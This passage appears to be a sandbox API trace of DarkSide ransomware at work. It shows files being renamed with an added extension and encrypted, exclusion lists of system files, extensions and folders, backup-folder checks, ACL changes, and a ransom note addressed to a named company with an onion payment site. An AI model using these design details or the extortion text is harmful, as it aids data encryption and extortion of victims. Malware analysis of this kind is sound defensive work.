HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" [0159.338] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned 0x4e [0159.338] wcscpy (in: _Dest=0x3250104, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0159.338] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.c06622a1"), dwFlags=0x8) returned 1 [0159.342] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1d4 [0159.342] CreateIoCompletionPort (FileHandle=0x1d4, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0159.342] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3990020 [0159.349] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x66c7bdb [0159.350] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1168b95c [0159.350] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7e1f3b3 [0159.350] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2e3351d4 [0159.350] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xf5ad5a1 [0159.350] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x88a9c98 [0159.350] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4d0e8e97 [0159.350] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6f038291 [0159.353] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3990094, Length=0x80) returned 0x55f1881a [0159.353] RtlComputeCrc32 (PartialCrc=0x881a, Buffer=0x3990094, Length=0x80) returned 0xb0d146c3 [0159.353] RtlComputeCrc32 (PartialCrc=0x46c3, Buffer=0x3990094, Length=0x80) returned 0x914bd911 [0159.353] RtlComputeCrc32 (PartialCrc=0xd911, Buffer=0x3990094, Length=0x80) returned 0x1af52089 [0159.353] RtlComputeCrc32 (PartialCrc=0x2089, Buffer=0x3990094, Length=0x80) returned 0xeee1e7a3 [0159.353] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3990020) returned 1 [0159.353] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0159.353] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0159.353] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0159.353] _wcsicmp (_Str1="Windows Live Spaces.url", _Str2="README.c06622a1.TXT") returned 5 [0159.353] wcsstr (_Str="Windows Live Spaces.url", _SubStr="README") returned 0x0 [0159.353] _wcsicmp (_Str1="autorun.inf", _Str2="Windows Live Spaces.url") returned -22 [0159.353] wcslen (_String="autorun.inf") returned 0xb [0159.353] _wcsicmp (_Str1="boot.ini", _Str2="Windows Live Spaces.url") returned -21 [0159.353] wcslen (_String="boot.ini") returned 0x8 [0159.353] _wcsicmp (_Str1="bootfont.bin", _Str2="Windows Live Spaces.url") returned -21 [0159.353] wcslen (_String="bootfont.bin") returned 0xc [0159.353] _wcsicmp (_Str1="bootsect.bak", _Str2="Windows Live Spaces.url") returned -21 [0159.353] wcslen (_String="bootsect.bak") returned 0xc [0159.353] _wcsicmp (_Str1="desktop.ini", _Str2="Windows Live Spaces.url") returned -19 [0159.353] wcslen (_String="desktop.ini") returned 0xb [0159.354] _wcsicmp (_Str1="iconcache.db", _Str2="Windows Live Spaces.url") returned -14 [0159.354] wcslen (_String="iconcache.db") returned 0xc [0159.354] _wcsicmp (_Str1="ntldr", _Str2="Windows Live Spaces.url") returned -9 [0159.354] wcslen (_String="ntldr") returned 0x5 [0159.354] _wcsicmp (_Str1="ntuser.dat", _Str2="Windows Live Spaces.url") returned -9 [0159.354] wcslen (_String="ntuser.dat") returned 0xa [0159.354] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Windows Live Spaces.url") returned -9 [0159.354] wcslen (_String="ntuser.dat.log") returned 0xe [0159.354] _wcsicmp (_Str1="ntuser.ini", _Str2="Windows Live Spaces.url") returned -9 [0159.354] wcslen (_String="ntuser.ini") returned 0xa [0159.354] _wcsicmp (_Str1="thumbs.db", _Str2="Windows Live Spaces.url") returned -3 [0159.354] wcslen (_String="thumbs.db") returned 0x9 [0159.354] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0159.354] wcslen (_String="386") returned 0x3 [0159.354] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0159.354] wcslen (_String="adv") returned 0x3 [0159.354] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0159.354] wcslen (_String="ani") returned 0x3 [0159.354] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0159.354] wcslen (_String="bat") returned 0x3 [0159.354] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0159.354] wcslen (_String="bin") returned 0x3 [0159.354] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0159.354] wcslen (_String="cab") returned 0x3 [0159.354] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0159.354] wcslen (_String="cmd") returned 0x3 [0159.354] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0159.354] wcslen (_String="com") returned 0x3 [0159.354] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0159.354] wcslen (_String="cpl") returned 0x3 [0159.354] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0159.355] wcslen (_String="cur") returned 0x3 [0159.355] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0159.355] wcslen (_String="deskthemepack") returned 0xd [0159.355] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0159.355] wcslen (_String="diagcab") returned 0x7 [0159.355] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0159.355] wcslen (_String="diagcfg") returned 0x7 [0159.355] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0159.355] wcslen (_String="diagpkg") returned 0x7 [0159.355] _wcsicmp (_Str1="dll", _Str2="url") returned -17 [0159.355] wcslen (_String="dll") returned 0x3 [0159.355] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0159.355] wcslen (_String="drv") returned 0x3 [0159.355] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0159.355] wcslen (_String="exe") returned 0x3 [0159.355] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0159.355] wcslen (_String="hlp") returned 0x3 [0159.355] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0159.355] wcslen (_String="icl") returned 0x3 [0159.355] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0159.355] wcslen (_String="icns") returned 0x4 [0159.355] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0159.355] wcslen (_String="ico") returned 0x3 [0159.355] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0159.355] wcslen (_String="ics") returned 0x3 [0159.355] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0159.355] wcslen (_String="idx") returned 0x3 [0159.355] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0159.355] wcslen (_String="ldf") returned 0x3 [0159.355] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0159.355] wcslen (_String="lnk") returned 0x3 [0159.356] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0159.356] wcslen (_String="mod") returned 0x3 [0159.356] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0159.356] wcslen (_String="mpa") returned 0x3 [0159.356] _wcsicmp (_Str1="msc", _Str2="url") returned -8 [0159.356] wcslen (_String="msc") returned 0x3 [0159.356] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0159.356] wcslen (_String="msp") returned 0x3 [0159.356] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0159.356] wcslen (_String="msstyles") returned 0x8 [0159.356] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0159.356] wcslen (_String="msu") returned 0x3 [0159.356] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0159.356] wcslen (_String="nls") returned 0x3 [0159.356] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0159.356] wcslen (_String="nomedia") returned 0x7 [0159.356] _wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0159.356] wcslen (_String="ocx") returned 0x3 [0159.356] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0159.356] wcslen (_String="prf") returned 0x3 [0159.356] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0159.356] wcslen (_String="ps1") returned 0x3 [0159.356] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0159.356] wcslen (_String="rom") returned 0x3 [0159.356] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0159.356] wcslen (_String="rtp") returned 0x3 [0159.356] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0159.356] wcslen (_String="scr") returned 0x3 [0159.356] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0159.356] wcslen (_String="shs") returned 0x3 [0159.356] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0159.356] wcslen (_String="spl") returned 0x3 [0159.357] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0159.357] wcslen (_String="sys") returned 0x3 [0159.357] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0159.357] wcslen (_String="theme") returned 0x5 [0159.357] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0159.357] wcslen (_String="themepack") returned 0x9 [0159.357] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0159.357] wcslen (_String="wpx") returned 0x3 [0159.357] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0159.357] wcslen (_String="lock") returned 0x4 [0159.357] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0159.357] wcslen (_String="key") returned 0x3 [0159.357] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0159.357] wcslen (_String="hta") returned 0x3 [0159.357] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0159.357] wcslen (_String="msi") returned 0x3 [0159.357] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0159.357] wcslen (_String="pdb") returned 0x3 [0159.357] _wcsicmp (_Str1="sqlite", _Str2="url") returned -2 [0159.357] wcslen (_String="sqlite") returned 0x6 [0159.357] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live")) returned 0x10 [0159.357] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0159.357] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" [0159.357] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned 0x38 [0159.358] wcscpy (in: _Dest=0x32400d2, _Source="Windows Live Spaces.url" | out: _Dest="Windows Live Spaces.url") returned="Windows Live Spaces.url" [0159.358] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url", dwFileAttributes=0x80) returned 1 [0159.358] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0159.358] SetFilePointerEx (in: hFile=0x1e0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0159.358] CloseHandle (hObject=0x1e0) returned 1 [0159.358] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0159.358] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" [0159.358] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 0x50 [0159.358] wcscpy (in: _Dest=0x3250108, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0159.358] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.c06622a1"), dwFlags=0x8) returned 1 [0159.360] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1e0 [0159.360] CreateIoCompletionPort (FileHandle=0x1e0, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0159.360] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3a20020 [0159.368] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7964fba0 [0159.368] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4ee13e72 [0159.368] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x76e64e72 [0159.368] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x14f9f91b [0159.368] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1510871b [0159.368] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5aaa6497 [0159.368] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x721cdd2c [0159.368] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x14765426 [0159.371] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3a20094, Length=0x80) returned 0x64d02497 [0159.371] RtlComputeCrc32 (PartialCrc=0x2497, Buffer=0x3a20094, Length=0x80) returned 0xa9a165b9 [0159.371] RtlComputeCrc32 (PartialCrc=0x65b9, Buffer=0x3a20094, Length=0x80) returned 0x4cef2d1d [0159.371] RtlComputeCrc32 (PartialCrc=0x2d1d, Buffer=0x3a20094, Length=0x80) returned 0xd8df2ee7 [0159.371] RtlComputeCrc32 (PartialCrc=0x2ee7, Buffer=0x3a20094, Length=0x80) returned 0x5706298d [0159.371] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3a20020) returned 1 [0159.371] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0159.371] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0159.371] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0159.371] FindClose (in: hFindFile=0x154188 | out: hFindFile=0x154188) returned 1 [0159.372] _wcsicmp (_Str1="backup", _Str2="Windows Live") returned -21 [0159.372] wcslen (_String="backup") returned 0x6 [0159.372] _wcsicmp (_Str1="bak", _Str2="Windows Live") returned -21 [0159.372] wcslen (_String="bak") returned 0x3 [0159.372] _wcsicmp (_Str1="back", _Str2="Windows Live") returned -21 [0159.372] wcslen (_String="back") returned 0x4 [0159.372] _wcsicmp (_Str1="archive", _Str2="Windows Live") returned -22 [0159.372] wcslen (_String="archive") returned 0x7 [0159.372] _wcsicmp (_Str1="bckp", _Str2="Windows Live") returned -21 [0159.372] wcslen (_String="bckp") returned 0x4 [0159.372] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0159.373] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0159.374] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0159.374] FindClose (in: hFindFile=0x154148 | out: hFindFile=0x154148) returned 1 [0159.376] _wcsicmp (_Str1="backup", _Str2="Favorites") returned -4 [0159.376] wcslen (_String="backup") returned 0x6 [0159.376] _wcsicmp (_Str1="bak", _Str2="Favorites") returned -4 [0159.376] wcslen (_String="bak") returned 0x3 [0159.376] _wcsicmp (_Str1="back", _Str2="Favorites") returned -4 [0159.376] wcslen (_String="back") returned 0x4 [0159.376] _wcsicmp (_Str1="archive", _Str2="Favorites") returned -5 [0159.376] wcslen (_String="archive") returned 0x7 [0159.376] _wcsicmp (_Str1="bckp", _Str2="Favorites") returned -4 [0159.376] wcslen (_String="bckp") returned 0x4 [0159.376] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x1f8e18) returned 1 [0159.376] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0159.376] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0159.376] _wcsicmp (_Str1="$recycle.bin", _Str2="Links") returned -72 [0159.376] wcslen (_String="$recycle.bin") returned 0xc [0159.376] _wcsicmp (_Str1="config.msi", _Str2="Links") returned -9 [0159.376] wcslen (_String="config.msi") returned 0xa [0159.376] _wcsicmp (_Str1="$windows.~bt", _Str2="Links") returned -72 [0159.376] wcslen (_String="$windows.~bt") returned 0xc [0159.376] _wcsicmp (_Str1="$windows.~ws", _Str2="Links") returned -72 [0159.376] wcslen (_String="$windows.~ws") returned 0xc [0159.376] _wcsicmp (_Str1="windows", _Str2="Links") returned 11 [0159.376] wcslen (_String="windows") returned 0x7 [0159.376] _wcsicmp (_Str1="appdata", _Str2="Links") returned -11 [0159.376] wcslen (_String="appdata") returned 0x7 [0159.377] _wcsicmp (_Str1="application data", _Str2="Links") returned -11 [0159.377] wcslen (_String="application data") returned 0x10 [0159.377] _wcsicmp (_Str1="boot", _Str2="Links") returned -10 [0159.377] wcslen (_String="boot") returned 0x4 [0159.377] _wcsicmp (_Str1="google", _Str2="Links") returned -5 [0159.377] wcslen (_String="google") returned 0x6 [0159.377] _wcsicmp (_Str1="mozilla", _Str2="Links") returned 1 [0159.377] wcslen (_String="mozilla") returned 0x7 [0159.377] _wcsicmp (_Str1="program files", _Str2="Links") returned 4 [0159.377] wcslen (_String="program files") returned 0xd [0159.377] _wcsicmp (_Str1="program files (x86)", _Str2="Links") returned 4 [0159.377] wcslen (_String="program files (x86)") returned 0x13 [0159.377] _wcsicmp (_Str1="programdata", _Str2="Links") returned 4 [0159.377] wcslen (_String="programdata") returned 0xb [0159.377] _wcsicmp (_Str1="system volume information", _Str2="Links") returned 7 [0159.377] wcslen (_String="system volume information") returned 0x19 [0159.377] _wcsicmp (_Str1="tor browser", _Str2="Links") returned 8 [0159.377] wcslen (_String="tor browser") returned 0xb [0159.377] _wcsicmp (_Str1="windows.old", _Str2="Links") returned 11 [0159.377] wcslen (_String="windows.old") returned 0xb [0159.377] _wcsicmp (_Str1="intel", _Str2="Links") returned -3 [0159.377] wcslen (_String="intel") returned 0x5 [0159.377] _wcsicmp (_Str1="msocache", _Str2="Links") returned 1 [0159.377] wcslen (_String="msocache") returned 0x8 [0159.377] _wcsicmp (_Str1="perflogs", _Str2="Links") returned 4 [0159.377] wcslen (_String="perflogs") returned 0x8 [0159.377] _wcsicmp (_Str1="x64dbg", _Str2="Links") returned 12 [0159.377] wcslen (_String="x64dbg") returned 0x6 [0159.377] _wcsicmp (_Str1="public", _Str2="Links") returned 4 [0159.377] wcslen (_String="public") returned 0x6 [0159.377] _wcsicmp (_Str1="all users", _Str2="Links") returned -11 [0159.378] wcslen (_String="all users") returned 0x9 [0159.378] _wcsicmp (_Str1="default", _Str2="Links") returned -8 [0159.378] wcslen (_String="default") returned 0x7 [0159.378] wcscpy (in: _Dest=0x1d1000, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" [0159.378] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned 0x23 [0159.378] wcscpy (in: _Dest=0x1d1044, _Source="Links" | out: _Dest="Links") returned="Links" [0159.378] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x1f8e18 [0159.378] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0159.378] wcscpy (in: _Dest=0x1f8e18, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" [0159.378] GetNamedSecurityInfoW () returned 0x0 [0159.378] SetEntriesInAclW () returned 0x0 [0159.378] SetNamedSecurityInfoW () returned 0x0 [0159.381] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22b668) returned 1 [0159.381] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32eb6c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0159.381] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links")) returned 1 [0159.382] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0159.382] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0159.382] WriteFile (in: hFile=0x1a4, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32eb3c, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32eb3c*=0x7ca, lpOverlapped=0x0) returned 1 [0159.383] CloseHandle (hObject=0x1a4) returned 1 [0159.383] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0159.383] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links")) returned 0x11 [0159.383] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="" [0159.383] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned 0x28 [0159.383] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", fInfoLevelId=0x0, lpFindFileData=0x32ed9c, 